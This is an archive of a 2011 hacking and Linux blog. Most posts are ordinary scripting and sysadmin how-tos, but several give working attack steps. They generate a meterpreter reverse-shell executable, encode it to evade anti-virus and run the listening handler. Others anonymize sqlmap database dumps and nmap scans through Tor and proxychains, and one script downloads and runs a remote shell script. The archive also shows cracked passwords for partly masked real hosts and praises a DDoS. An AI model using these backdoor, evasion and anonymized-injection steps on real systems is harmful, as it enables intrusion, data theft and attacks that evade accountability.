Exploit-DB updates

Friday, November 4, 2011

Thursday, November 3, 2011

Python Curses Example / Tutorial

I wanted to make a small example tutorial on getting started with a curses UI in python. We'll get started by creating our screen and adding a simple string;


import curses

screen = curses.initscr() # Creates our screen
curses.noecho() # Keeps the keys we press from
curses.cbreak() # Takes input right away
screen.keypad(1)
screen.addstr(10,0,"Resist Monsanto!") # Add a string at 10,0
screen.refresh() # Refresh screen now that strings added
# While loop to wait for key events, then
while 1:
 key = screen.getch() # Get presse keys
 if key == ord("q"): break
curses.endwin() # Closes curses environment

This should result in a screen with the string "Resist Monsanto" in it. If we wanted to use colors we can create color pairs to use like so:

First we initiate the color scheme and than we will create a color pair;

curses.start_color()
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK) # Creates a color pair as 1 with foreground cyan and background black

We can now use this color pair when adding a string for example;

screen.addstr(10,25,"Resist Monsanto!",curses.color_pair(1)) # Add a COLORED string located at (10,25)


This would result in the following script - http://pastebin.com/0EU7UKqZ

But lets say we wanted to get user input rather than just the key event and create a variable out of it, in this case we would use curses.getstr() function. Here we'll create a simple function to get our input called command().

def command():
 curses.echo() # Allows out input to be echo'd to the screen
 cmd = screen.getstr(0,1,15) # Creates an "input box" at the location (0,1) with an input buffer of 15

Now that we have out input as the string cmd, lets just verify it worked and echo it back out.

def command():  # Press "c" to start user input
 curses.echo() # Allows out input to be echo'd to the screen
 cmd = screen.getstr(0,1,15) # Creates an "input box" at the location (0,1) with an input buffer of 15 chars
 curses.noecho() # Turns echo back off
 screen.addstr(2,0,cmd,curses.color_pair(2)) # Adds users input


This would result in the following - http://pastebin.com/zVzrGz0n

You can use that input for whatever you'd like now, whether you want to issue a subprocess and pipe the ouput to the UI, or connect to a server, but that sums up this quick example. I'll delve more into it in a latter post. Take care!

Thursday, October 27, 2011

Python Script for Monitoring a site to see whether it's up or down

Quick script I coded to save me time checking to see if a site was down, so I wrote this script to do it for me and to send me an alert using "libnotify-bin" if it happens to go down.

Two methods are available, Ping and HTTP Requests.

If I decide to add more methods, or add more sites to the HTTP request (to insure accuracy) than I'll post an update.. until then I hope you find this useful!

Source - http://pastebin.com/6Aemf2Y8

Monday, October 24, 2011

Python Script to Parse Files for MD5 Hashes

This script demonstrates basic usage of regular expressions in order to look for MD5's (AKA [0-9a-f]{32}) and write them to an output file.

Usage :

Python # python md5parser.py SomeFile.txt MD5list
File parsed ~ 6 hashes found.

Python # cat MD5list
aad3b435b51404eeaad3b435b51404ee
9a5760252b7455deaad3b435b51404ee
0d7f1f2bdeac6e574d6e18ca85fb58a7
9a5760252b7455deaad3b435b51404ee
0d7f1f2bdeac6e574d6e18ca85fb58a7
098f6bcd4621d373cade4e832627b4f6

Script: http://pastebin.com/PPnDs6AU

Python script to parse medusa logs and check if hosts are alive

As the title says, this is a script to parse medusa logs to in order to check if the host is alive, if it's been cracked then it will also display the password for the hosts service that specified when using medusa. Handy for parsing large medusa logs to see who's up.

Ex.

Python # sudo python check.py /root/medusa.log
Checking for live hosts.
220.XX3.1XX.20 is down...
83.XXX.1X9.246 is up!
Password:r00t3d
186.X2.X5.X is down...
190.XXX.37.XX4 is up!
Password:qwerty
79.1XX.XX9.166 is down...
216.XXX.1X9.106 is up!
Password:L4M3R
89.XXX.13X.39 is down...
136.XX9.XXX.106 is down...
31.44.137.109 is down...
15X.5X.70.X is down...
189.10X.175.X74 is down...
208.124.56.2X9 is down...
129.X3.1X2.1X5 is down... 
X8.4X.39.XXX is up!
Password:[SUCCESS] 
XXX.114.1X0.202 is down...
X2.91.XX.1 is up!
Password:123456
...
 
You can find the script below;

http://pastebin.com/QUUV39KU

Python script to look up all the sites hosted on given IP/URL

Here's a script you can use to find out all the domains hosted on the given IP/URL. Takes a command line argument as you can see in the code;

Python # python sharedhosts.py www.monsanto.in
33 sites hosted on IP Address 184.22.117.180
\_________________________________________/
/

http://www.outboards.cn
http://www.sieunhandienquang.com
http://www.medhelp.in
http://www.alibre.cn
http://www.doppelstock.net
http://www.sexhuflit.com
...

I cut the list down to save space, you can find the script below;

http://pastebin.com/BzypB63Q

Monday, October 17, 2011

Python script to parse syslog/audit.log for ssh activity.

I wrote this quick script to parse through my audit log for ssh login attempts and than decided to make it usable on my ubuntu-based box too. Below you can find the source code;

logmon.py


sshmon.py

http://pastebin.com/ehkm5syX

It's pretty strightforward, you run the logmon.py and type in ssh to run the sshmon module for your distro (Detects Ubuntu and Red Hat as of right now, you can easily tweak it to meet your needs). I made this for my own use so it's not perfect, and I plan on improving it and adding more modules to suit my needs. If I do than I'll post updates.

Find out which linux version you're running.

Here I will show you a few ways to find out which version of linux you're running, which may come in handy when writing scripts or something of that sort.

uname -a
cat /proc/version
dmesg | grep "Linux version"

You can also find out which distribution release it is like so;

cat /etc/*-release

Saturday, October 8, 2011

Making command alias's to shorten long commands.

I haven't posted in a while, but I wanted to make a quick post on how to make an alias for long commands to reduce your typing. 

For example, if I often had to perform MITM attacks during assessments/pentests than I may want to make an alias for the iptables rules. To do this I can create the following alias like so;

alias sslrule='iptables -t nat -A PREROUTING -p tcp --destination-port  80 -j REDIRECT --to-ports 10000'
alias rules='echo -e "\033[1;41;1mNAT Rules";iptables -t nat -L -nv;echo -e "\033[1;44;1mPlain Rules";iptables -L -nv;echo -e "\033[0m"'

Now instead of typing out that long rule you can just type sslrule, and to see the rules in a distinctive manner I can just type rules.

Now this isn't a permanent alias, if we want to make a permanent alias than we'll need to edit our .bashrc file and add the alias there. In my case it will be located in /root/.bashrc. From there you can just append the alias's of your choice below the existing ones and you'll now have a permanent alias to save you some typing (and carpal tunnel).

Friday, September 9, 2011

Mounting a windows partition

This is a quite "how-to" on mounting a partition in GNU/Linux. First we need to identify which partition we want to mount. To do this we'll issue the fdisk command;

~ # fdisk -l

This lists the partitions, we're looking for a partition that has NTFS under the system column.

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1         192     1536000   27  Unknown
/dev/sda2             192        7734    60579043+   7  HPFS/NTFS                  <----
/dev/sda3           29333       30402     8586240   17  Hidden HPFS/NTFS
/dev/sda4            7734       29333   173495297    5  Extended
/dev/sda5           28962       29333     2976768   82  Linux swap / Solaris
/dev/sda6           28591       28962     2972672   82  Linux swap / Solaris
/dev/sda7           18273       18496     1798144   82  Linux swap / Solaris
/dev/sda8            7734       18273    84653056   83  Linux


Now we want to create a directory in our /media/ directory which is where we'll mount the windows partition.

mkdir -p /media/Winblows

Now we're reading to mount it in the directory we just created.

mount -t ntfs -o nls=utf8,umask=0222 /dev/sda2 /media/Winblows

That should successfully mount your windows ntfs partition in the directory we created, hope this helps!

VNC Weak Password Bash Scanner

This is an old bash script I wrote some time ago, it uses the .jar that I coded a while back to parse nmap logs for IP's. You can find the bash script at the following pastebin and the jar used to parse the nmap logs below that.

Script - http://pastebin.com/swQGK6mi

Jar - http://hakhub.blogspot.com/2011/05/bash-scripting-friendly-java-ip-parser.html

Friday, August 26, 2011

Python and Shell Commands (Popen) example

Well I've recently moved back to python after learning PHP/MySQL for a while, so as I learned I coded a small program to issue remote commands. It essentially opens a given socket and waits for a connection, when a connection is established it prompts the user for validation. If validation is successful it passes a shell (limited to /bin tools) which you can use to issue remote commands. It also adds an iptables firewall rule to accept all packets on the port you specified which it then deletes when you exit the shell. All activity is logged to Logfile.log, including failed login attempts and their IP.

Things you can learn from this script: 

User Validation using the hashlib and a sha512'd password 
Command line arguments
Popen shell commands 
Reading/Writing Files
Basic sockets 

I wrote another small script to connect to the host, but in the end I decided to just use netcat instead. Example usage;

Host:
~$ python recon.py 1984

Client:

~$ nc -vv 19.84.20.11 1984

Script - http://pastebin.com/Mx600RA8

Getting started with iptables

Okay so I have probably talked about iptables before, and used it in previous tutorials, but now I've decided to talk about it in particular. iptables is extremely useful and powerful if configured properly. We'll start off with a very basic rule, allowing all traffic to and from telnet.

iptables -A INPUT -p tcp --destination-port 23 -j ACCEPT

Now we should be allowing all connections on port 23 (telnet).

We can view the rules we have like so;

iptables -L

If we had wanted to list the table with numeric values instead, use the (-n) flag. In addition, we can specify what rules we want to list (INPUT, OUTPUT, etc) and increase the verbosity to see the packet and byte statistics.

iptables -L INPUT -n -v

Now, that's nice and all but I'd like to filter out SSH on this laptop to drop any packets coming from IP's other than mine. In order to do this, I would issue the following command.

iptables -A INPUT -p tcp --dport 22 ! -s 19.84.20.11 -j DROP

Now any packets coming from a source ip other than the one I specified will be dropped for ssh. This applies to blacklisting IP's, which can easily be circumvented with proxies like TOR though. But if we had wanted to accept all packets except a specific IP, than we can issue the same command with (-j ACCEPT) rather than dropping it.


iptables -A INPUT -p tcp --dport 22 ! -s 19.84.20.11 -j ACCEPT

Now everyone but my home network can ssh into this box.

If we wanted to "flush" our chain, we can issue the following command;

iptables -F

That will have removed all the rules in the chain.
Another nice feature of iptables is the ability to redirect traffic to another port, so for example if we issued the following command than we would be redirecting the unwanted traffic from SSH to our honeypot's port.

iptables -t nat -A PREROUTING -p tcp --dport 22 ! -s 19.84.20.11 -j REDIRECT --to-port 1984

Now, nat rules are located in a separate are than you average rules. If we wanted to view these rules than we would need to explicitly specify that it's the nat rules we want to see or modify. For example, to view the rules and then flush them we would issue the following;

iptables -t nat -L -nv

iptables -t nat -F

That about wraps it up for my "how to" on getting started with iptables. Hope this helps someone else out there.







Thursday, August 18, 2011

Simple PHP Toolkit

Well I've been learning PHP/MySQL lately so while learning I decided to make something of use (well... kind of). But I've decided to move to python for my web development, so I decided to just post what I've coded so far for others to play with and learn from. If uses a MySQL DBase to login, which you can set up using that queries in my previous post on the hash cracker.

What it has;

Malware String Detector (looks through files for specific strings, which you can specify - I used it for looking through keyloggers for email credentials)
Basic Port Scanner

MD5 Hash Generator/Cracker

Below you can find the tar'd files.

PHP Scripts - http://www.mediafire.com/?g1iwudpkic5vip4
Images - http://www.mediafire.com/?7v2q2r469dn6mie

Wednesday, August 10, 2011

Windows Command Line/Console Alternative

Well I'm a linux guy, therefore I've come to love the CLI...which is unfortunately lacking on windows. I've had a stock windows starter install on this netbook I've been dual booting with and decided to play more with windows and do some malware analysis. I can't stand dealing with microsofts CLI, so I decided to look for an alternative... and I found exactly what I was looking for. "Console" is a Windows console window enhancement.

Console features include: multiple tabs, text editor-like text selection, different background types, alpha and color-key transparency, configurable font, different window style. 

This is a very nice addition for anyone who loves the CLI, and it really helps in customizing windows to suite me which makes for a more pleasant experience.

You can find the download here, on sourceforge.

http://sourceforge.net/projects/console/

Sunday, August 7, 2011

Basic PHP Hash Cracker (Updated)

Well I've previously posted the basic hash cracker I had coded in PHP, but it seems the links had died and since I've added MySQL Database functionality I decided I would just make an updated post with both of them and their sources.

To download the original one which doesn't use a SQL DBase and works on free hosting, use this version.

To download the latest version which stores cracked hashes and hashed words in a DBase which it then utilizes when cracking hashes by trying all the plaintext words in the DBase against the hash. You can download that version here.

To setup the MySQL Database, open up your MySQL shell and issue the following sql queries. (If you need help to get started with setting up a web server / using the MySQL shell than check out this post)

~$ mysql -u root -p

mysql> create database HashCracker;

mysql> create table HashCracker.users(UID int not null auto_increment,User varchar(50),Pass varchar(42),primary key(UID));

mysql> create table HashCracker.Hashes(HID int not null auto_increment,String varchar(50),Hash varchar(32),primary key(HID));

mysql> insert into HashCracker.users(User,Pass) values('Username',sha1('Password'));
Now your MySQL DBase should be all setup and ready for use. Just extract the contents of the tar into your /var/www directory (or whatever your webroot directory is) and log in with the credentials you specified in the query above. If you have any comments feel free to leave them.

Friday, August 5, 2011

Monitor Turns Off After A Few Seconds (FIX)

Well I had this old flat panel radius lying around just taking up room which I thought was broken, but I had given someone an old system including an old monitor from the 90's which I decided wasn't sufficient. I had decided to pull it out and take it apart to see what exactly was wrong as it would turn on and show the desktop for a brief second and then go black. I'm not much of a hardware guy, but lately I've been playing around with things salvaged from my former job. I fixed a brand new 7-in-1 Kodak printer/everything else you can imagine, which they tossed out because they thought it was broken. I also grabbed all the flat panels they were tossing out, and this radius was one of them. After doing some reading I realized this was a good sign the capacitors are dying, and the (temporary) fix didn't require any soldering. I was able to use it by simply turning the brightness down with the few seconds I had to navigate the menu with, then once I turned the monitor on again it had enough energy to stay on, at some point I may have to replace them, but I'm sure I have something lying around I can salvage some from.

Also using a higher power supply pack made it usable regardless of brightness or contrast, but switching out the compacitor will eventually need to be done I expect.

Thursday, July 14, 2011

Find out your hardware information in linux

This is very basic, but I hadn't known about it untill recently when I was given an old pc which I instantly install linux on. I don't do much when it comes to hardware as I can't really afford to... other than other peoples stuff I recycle. The quick way to find out all your hardware specs on linux is "lshw".  Turns out it had a 3.00 GHz CPU with a 512mb stick of ram and 3 open slots, which I just so happen to have 3 spare 512mb sticks laying around from other pcs I've recycled. So I ended up with a fully functional 3.00GHz CPU 2GB ram linux box, which made me more than happy... as I can't afford much.

Friday, July 8, 2011

Getting started with skipfish.

Well this is another great vulnerability scanner for webapp's, I really like it so far and thought it was well worth a post. So to start off, download skipfish from here. It has a great interface and outputs the results to an HTML file.

To find out more about the tool and the huge number of probes it performs, read their documentation here.

Now assuming you've downloaded the package from the link above, we will need to untar it and compile it with the make command.

~$ tar -xvzf skipfish-2.02b.tgz
~$ cd ./skipfish-2.02b
~/skipfish-2.02b $ make

Now it should have compiled, but if you get an error along the lines of this;

make: cc: Command not found
make: *** [skipfish] Error 127

Then you may need to install GCC, you also will need libidn installed.

Now assuming we have it all compiled and ready to go, you should have file called "skipfish" in the current directory. You will have to either specify the worldlist you'd like skipfish to use or copy one from the dictionaries directory into the directory that has skipfish in it. 

I'll be specifying one of the dictionaries that come with this tool.

Let's assume we're auditing this blog, we would issue the following command.

~/skipfish-2.02b $ ./skipfish -W /skipfish-2.02b/dictionaries/complete.wl -o outputdir http://www.hakhub.tk 

That'll get skipfish scanning, you can watch the process via the CLI and the results will be stored in the "outputdir" you specified. So you can view the results in your browser of choice. 

~/skipfish-2.02b $ cd
~$ cd ./outputdir
~/outputdir $ firefox index.html

From there, you can analyze the results and perform your audit or fix your code.

Sunday, July 3, 2011

Getting started with MySQL Shell

Okay so I've just recently started getting into a web dev and what not, but I thought I'd make a quick how-to for getting started with MySQL on the linux platform.

First off, make sure you've got a LAMP setup (Linux Apache MySQL & PHP). If you're using a debian based distro you can download them with the repositories like so;

sudo apt-get install apache2 mysql-server apache-mod-php5 php5-mysql

After those install, you'll want to set a password for your MySQL account (MySQL SHOULD be running, but it can be started like so; /etc/init.d/mysql start).

mysqladmin -u root password ThePassword


Now you should set your password set, you can login to MySQL and get to the fun stuff.

mysql -u root -p

You'll be prompted for your pass, after you log in you can start interacting with the DBase. 

/*
Alternatively you can log in without a password, as there is none by default. then could could issue the query like this;

mysql -u root
mysql> SET PASSWORD FOR 'root'@'localhost' = PASSWORD('Yourpassword');

 */

If for wanted to view the existing DBases you can issue the following command;

mysql> show databases;

Now to create a DBase you can simply do this;

mysql> create database MonsantosArsenal;

Now if we wanted to move to that DBase we could do the following;

mysql> use MonsantosArsenal;

Now, what's a DBase without tables?

mysql> create table Weapons(
         WepID int,
         Weapon varchar(50)
          );

And that'll create a table named Weapons in the Database MonsantosArsenal. You can now begin adding columns with the insert command, but first I want to point out that you can set a integer to automatically increment by 1 like this;


mysql> create table Weapons(
         WepID int not null auto_increment,
         Weapon varchar(50)
          );

mysql> insert into MonsantosArsenal (Weapon)
          VALUES("Genetically modified food");

You now have a table with a column named "Weapon" that has the value we chose to insert. I hope this helps get you started with the mysql shell.

Anonymizing SQL Injections

So I've previously made posts about things like tor and sqlmap, but I just wanted to make this quick post to show that you can combine the two in order to increase anonymity when doing pentests or what have you. So assuming you have TOR up and running with default settings, if not you can find a how-to here, we will use sqlmap's --tor flag.

python sqlmap.py -u www.example.com/fuckmonsanto.php?prodID=23 --beep --eta --tor --dump-all

or if you're not using TOR or simply having issues, you can use the proxy flag instead. I'll be using polipo, which is utilizing tor, so I will be using my localhost and port 8123 which is the default port used by polipo. You could alternatively use a proxy off the web.

sqlmap -u www.example.com/fuckmonsanto.php?prodID=23 --beep --eta --proxy=http://127.0.0.1:8123 --dump-all

It's sadly as simply as that.

Saturday, July 2, 2011

"Linux: can't open /dev/dsp" Festival FIX

Well I've had no problems with festival on my netbook, but when I tried to used it on my desktop I got the error "Linux: can't open /dev/dsp". It seems this is due to the fact that festival uses outdated OSS emulation, to fix this problem just issue the following command;

printf ";use ALSA\n(Parameter.set 'Audio_Method 'Audio_Command)\n(Parameter.set 'Audio_Command \"aplay -q -c 1 -t raw -f s16 -r \$SR \$FILE\")\n" > .festivalrc 

Now you can test to check whether it's working or not.


echo "Resist Monsanto" | festival --tts

Monday, June 27, 2011

Basic PHP Hash Cracker

Well, I've moved from Java to C++ untill I had got more interested in web security... which led me to stray away from C++ and learn some web dev. Right now I'm learning PHP, and in the process made this simple hash cracker. Below you can find the source and a very basic dictionary ( Approx. 19mb), for testing purposes. You can check out the working version hosted here, if I make and updates to it (such as supplying a hash list instead of a single hash) than I'll update this page or make a new post.
 
Source
Example

Tuesday, June 21, 2011

Java MD5 parser

Well, I don't code in Java much anymore but I had encountered a task which involved isolating MD5 hash's from a rather large text file, which would have been a pain in the ass to do manually. In addition, I tried awk, grep and sed a bit. They all worked to a lesser degree, but not quite what I was looking for. So I remembered the Java IP parser I coded for parsing nmap logs and pulling the IPs, so I just altered the regex to pull MD5's instead and write them to a file rather than IPs. So because I found it rather helpful, I decided to make a quick post and link the new source and jar file.

I think sed could have actually done the job but I wasn't having any luck and this alternative was extremely easy and quick. Plus it does exactly what I needed.


Usage;

java -jar md5.jar filename.txt

Saturday, June 18, 2011

Adding fluxbox styles.

I've had a few people ask me how to change their fluxbox theme, so I've decided to make a quick how-to on adding styles, which is very easy.

First off, know your fluxbox styles are stored in "/usr/shares/fluxbox/styles"

So all you have to do is download your theme of choice and extract it into the themes folder. Now the new style should be listed in the fluxbox settings.

Bam, you're done.

Compiling skipfish and fixing errors.

iWell, this is the second time I'm writing this... so this one will be a bit more brief, I had encountered some issues when installing the latest version of skipfish on my desktop, one involving "idna.h" and the other a whole plethora of ssl related issues. With some googling I solved the issue, so I've decided to make a quick post to help others who want to install this tool or have encountered the same error as I had. 

These two issues I had could be solved by downloading the following packages, but we will want to update first of course.

sudo apt-get update
sudo apt-get install libssl-dev && sudo apt-get install libidn11-dev

Now we will proceed on to downloading the source for those who have just come across this to compile it, or whatever the case may be.

wget http://skipfish.googlecode.com/files/skipfish-1.94b.tgz
tar -xvzf skipfish-1.94b.tgz
cd ./skipfish-1.94b
make

Now you should have successfully compiled yourself a working skipfish binary which can be used like so;

./skipfish -h

Friday, June 17, 2011

Find a file and its directory in linux

Okay this is a quick tip, which a lot of you guys probably know, but I forgot about it untill just now. I always find myself in a situation where I need to find a files location but can't seem to locate it, at which point I resort to google. But a quicker and easier way to do this is the "whereis" command.

~ $ whereis conky
conky: /usr/bin/conky /etc/conky /usr/lib/conky /usr/share/man/man1/conky.1.gz

Alternatively you could use the find command.

 ~ # find / -iname conky
/etc/conky
/usr/bin/conky
/usr/share/doc/conky
/usr/lib/conky

Monday, June 13, 2011

Anonymous nmap scans

This is an extremely simple tutorial on how you can use "proxychains" to anonymize your nmap scans, or to trip the IDS/Firewalls with multiple IPs to mask which one you really are. First, proceed to the following link to download the proxychains package.

http://prdownloads.sourceforge.net/proxychains/proxychains-3.1.tar.gz?download

Now we need to extract it's contents with the "tar" command so that we can configure it and compile it.

~ $ tar -xvzf proxychains-3.1.tar.gz

That will extract it to your root directory, now we will "cd" into that directory and configure it, then compile it.

cd ./proxychains-3.1
./configure
make install

Now you'll have proxychains configured for you system and have compiled a binary. Before you can use it you must configure it, unless you're using tor, which is it's default setting - socks5 127.0.0.1 9050.

nano proxychains.conf

At this point you will want to scroll down to the bottom of the file, which is where you will configure which proxies and what type they are. You can find proxies at one of the following links at the bottom of this site.

For example the default should look like this;
#        Examples:
#
#               socks5  192.168.67.78   1080    lamer   secret
#               http    192.168.89.3    8080    justu   hidden
#               socks4  192.168.1.49    1080
#               http    192.168.39.93   8080
#
#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050

So, if you're using tor than you can just leave it, or add more proxies in the chain. Say I wanted to add an http proxy to the chain, I would edit the config file like so.

#        Examples:
#
#               socks5  192.168.67.78   1080    lamer   secret
#               http    192.168.89.3    8080    justu   hidden
#               socks4  192.168.1.49    1080
#               http    192.168.39.93   8080
#
#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050
http 189.47.194.196 8080 

Now, you're ready to use it. You can run a tool through proxychains like this;

./proxychains nmap 199.66.1.11

And that about wraps it up for this quick how-to on anonymizing nmap scans.

Sunday, June 12, 2011

Anonymous targets Monsanto

Well, it looks like Monsanto was recently in anons scope, being hit with a DDoS that was said to have lasted over 60 hours. There was also vulnerabilities found such as SQLi on their foreign sites though their focus seemed to have been on DoSing monsanto.com

As I write this, their site still remains to be down due to the Dos anon was so nice as to supply. It seems even anon realizes monsanto is a terrible corporation whose main goal is complete control of the food supply. As Henry Kissinger once said, "If you control the oil you control the country; if you control food, you control the people.

I really hope the population wakes up and gets a grip on reality, rather than this material illusion the general publics subcumb to. 

I'm glad the hacking community takes notice of Monsanto and their dirty ways, rather the cracking a tin foil hat joke while stuffing their face with genetically modified chips covered in MSG and watching television.

Saturday, June 4, 2011

Notify-Send - On Screen text display

To start off, download the following package with your repositories;

apt-get install libnotify-bin

After that you can test it like so;

notify-send "Resist Monsanto"

That will create a popup on your screen displaying the text you entered.

Now if you were to try to enter a command within the quotes, or even without, it will simply be displayed as text. The way of telling notify-send to display the results of a command is by encapsulating the command withing " ` ". For example;

notify-send "` w `"

Though that's a big jumbled up on this netbook, so I'm going to pipe it to awk to shorten it a bit and just display what I want to see.

notify-send "` w | awk '{print $1 " -> " $8}'`"

So now that will show me whos logged onto this system and what they're currently doing. I could have this process automated with a while loop in order to have some desired notification displayed to me every however amount of minutes I've chosen. For example;

while [ 1 ]; do notify-send "` w | awk '{print $1 " -> " $8}'`"; sleep 10; done

That would create a pop-up every 10 seconds showing me who's logged on and what they're currently doing. If we wanted something a big longer than a few seconds than you can add a "m" in the sleep command we issued to make it 10 minutes instead.

while [ 1 ]; do notify-send "` w | awk '{print $1 " -> " $8}'`"; sleep 10m; done

You can also alter the amount of time the popup is displayed by specifying a time in milliseconds that you'd like it to be displayed before expiring.

notify-send -t 5 "` w | awk '{print $1 " -> " $8}'`" 

Another feature of notify-send is the ability to display icons, and a title. This is demonstrated below;

notify-send "Monsanto" "Genetically Modifying People Near YOU" -i /usr/share/pixmaps/terminator.xpm -t 5000

You may not have that icon if you don't have the terminal emulator "terminator" in which case I highly suggest giving a try. It's by far my favorite terminal. 

Now that just about covers this brief "how-to" on notify-send, and as you can see there's quite a few things this tool can be used for. I'm sure you'll think of plenty of your own ideas. Feel free to share the things you use notify-send for, and maybe share your own scripts and ideas.

Bypassing Anti-Virus with msfencode.

Well I had recently posted about msfpayload and how to generate a backdoored exe using it. What I left out was msfencode, which is extremely useful because the "unpacked" executable is very likely to be detected by most Anti-Virus. You can find my previous post here.

Now lets take what we learned from the last post and pipe the msfpayload command to msfencode.

~ $ msfpayload windows/meterpreter/reverse_tcp LHOST=19.84.20.11 LPORT=3030 R | msfencode -e x86/shikata_ga_nai -t exe -c 5 -o FuckMonsanto.exe

Now this will pipe the payload to msfecode to be passed through the packer 5 times (-c specifies the amount of times to pass it through the encoder) and it will use the polymorphic xor encryption "shikata ga nai" and output the backdoor as "FuckMonsanto.exe"

You can fire up the handler in metasploit the same way as before, but I would like to add in the fact that you can run things as a "job" which will run in the background by using the "-j" option.

msf> use exploit/multi/handler 
msf exploit(Handler) > set payload windows/meterpreter/reverse_tcp 
msf exploit(Handler) > set LHOST=19.84.20.11 
msf exploit(Handler) > set LPORT=3030
msf exploit(Handler) > exploit -j

Now you can continue with your pentest while the handler runs in the background and waits for connections, at which point you can use the job command to see/interact with the jobs running in the background.

Sunday, May 29, 2011

Installing TOR manually - Debian / BT5

This will be a quick how-to on install tor manually in BT5. First, add the tor repositories to your sources.list like so;

nano /etc/apt/sources.list 

Then add the following tor repositories to the list, the distro will varry. To find out what version of debian you're running, simply read the debian version file with cat;

cat /etc/debian_version

Now you know what version of debian you're running, replace the <Distro> with that version. 

deb http://deb.torproject.org/torproject.org <Distro> main 

Save that with "ctrl-o" and then proceed to add the "GNU Privacy Guard" keys that are used to sign the tor packages;

gpg --keyserver keys.gnupg.net --recv 886DDD89 
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add - 

Now update your system and install the tor packages. 

apt-get update 
apt-get install tor tor-geoipdb 

Now tor's installed, you can move on to installing polipo and the GUI vidalia.

SIPVicious Usage

Well I was going to go and make a quick SIPVicious demo, but there's this video which was a good demo on what these scripts are capable of doing. So instead of making another video, I'll just embed his as it's a good tutorial.


SIPVicious - SIP/VOIP Auiditing Suite

SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems. It currently consists of four tools: 
  • svmap - this is a sip scanner. Lists SIP devices found on an IP range
  • svwar - identifies active extensions on a PBX
  • svcrack - an online password cracker for SIP PBX
  • svreport - manages sessions and exports reports to various formats
  • svcrash - attempts to stop unauthorized svwar and svcrack scans 
Find out more information as well as the official source here.

Friday, May 20, 2011

Using pipelines to pipe data.

Well this is a simple concept, but it's usefulness has no limits. It's the ability to pipe data output from one command into another. For example, I can use the use the "ip addr" command combined with grep to only display the lines containing the inet addresses.

 ~ $ ip addr | grep inet
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
    inet 10.0.0.3/24 brd 192.168.1.255 scope global eth0
    inet6 fe80::217:31ff:feda:9814/64 scope link
You could pipe that data along further to awk, then select specific data out of it to be displayed. For example;

 ~ $ ip addr | grep inet | awk '{print $2 ":" $4}'
           
            127.0.0.1/8:host
            ::1/128:host
            192.168.1.102/24:192.168.1.255
            fe80::217:31ff:feda:9814/64:link



Or another example could involve that simple java ip parser I made, while using it I noticed that alot of scans had duplicate ips, which could cause you to waste valuable time running tools against the same IP multiple times. I haven't been playing much with Java lately, so I decided to just fix the problem in a bash script with the use of the "uniq" command. This is the command the script uses to remove duplicate IP's from the IP list.

java -jar ips.jar nlog | uniq > iplist.txt

That would parse the nmap log for IP's and it's then piped over to the uniq command which removes duplicate IP's and writes it to a file called iplist.txt in a list format.

You can find that Java parser here.

Tuesday, May 17, 2011

Using wget to download ftp files

This is a quick example of how you can use wget to download more then just html files, in this case we will download a shell script off our ftp server and then execute it.

#! /bin/sh
echo -e "\033[1;32;1mAttempting to destroy monsanto before they contaminate the planet with hazardous GMO's"
wget --ftp-user Pathogen --ftp-password hakhub ftp://ftp.drivehq.com:21/DestroyMonsanto.sh
chmod 755 DestroyMonsanto.sh
./DestroyMonsanto.sh
echo "Too late"

That is a basic example of a shell script which would download a file using wget, give it the appropriate permissions, then execute it. If you need free ftp storage, check out drivehq.

Monday, May 16, 2011

BT5 was released.

Incase you guys haven't heard for some reason, BackTrack5 has been released. I'm really enjoying, probably my favorite one so far. GUI is nice, and the tools are great as always. Download it from here;

http://www.backtrack-linux.org/downloads/

Getting started with Armitage

Well I've never bothered playing with armitage before, but I figured what the hell. I decided to post a quick how-to on getting it fired up for the first time. First, make sure you're all up to date, then use your repositories to install armitage.

apt-get update
apt-get armitage

then we will have to fire up metasploits rpc deamon, as that's what armitage uses to interact with the metasploit framework.

msfrpcd -f -U msf -P test -t Basic

now make sure mysql is up and running;

/etc/init.d/mysql start

Now, make sure you're in armitage's directory and run the shell script "armitage.sh". For BT4 (BT5 is out) you would be issuing these commands.

cd /pentest/exploits/armitage
armitage.sh

Now, seeing as we set the user as "msf" and the password as "pass" with the msfrpcd command, we can just hit "connect". That should have done it, if all's well you see something like this;









Sunday, May 15, 2011

Creating an executable payload via msfpayload.

We'll be making a quick tutorial on how to create an executable using a metasploit payload. We will use a meterpreter payload, here's the command we would want to issue to create an ".exe".

msfpayload windows/meterpreter/reverse_tcp LHOST=19.84.20.11 LPORT=31337 X > /root/Shiny.exe

You can then verify it was created by using the "file" command, like so;

file /root/Shiny.exe

And it should say something along the lines of this;

/root/Shiny.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

You now have a working payload in the form of an exe, you can now fire up metasploit and use the exploit handler to listen for the incomming connections. Assuming we are in the the metasploit console, we would issue the following commands;

msf> use exploit/multi/handler 
msf exploit(Handler) > set payload windows/meterpreter/reverse_tcp 
msf exploit(Handler) > set LHOST=19.84.20.11 
msf exploit(Handler) > set LPORT=31337 
msf exploit(Handler) > exploit 

You now have a handler waiting for incoming connections from those who run your meterpreter payload.

Saturday, May 14, 2011

Using colors in bash scripts with ANSI/TV100 codes.

Well, I've made a few posts related to bash scripting so I though I'd make a quick post showing how you can add some color to your scripts. We will be using ANSI, here's a quick example of how to use it;

echo -e "Hey look at \033[1;32;1m this color, we'll make the rest of the script blue \033[0;34;1m"
nmap 127.0.0.1


Make sure you remember the "-e", which enables the interpretation of backslash escapes so it will actually except the ANSI code rather than printing it out like a normal string.
Console Color chart
Black       0;30     Dark Gray     1;30
Blue        0;34     Light Blue    1;34
Green       0;32     Light Green   1;32
Cyan        0;36     Light Cyan    1;36
Red         0;31     Light Red     1;31
Purple      0;35     Light Purple  1;35
Brown       0;33     Yellow        1;33
Light Gray  0;37     White         1;37
 
Backgrounds 
40     Black
41       Red
42     Green
43    Yellow
44      Blue
45   Magenta
46      Cyan
47     White

  
You can also add other attributes such as using underlined or bold/bright text by changing the last digit in the code, just before the "m". For example, to use the underline attribute I would do this;


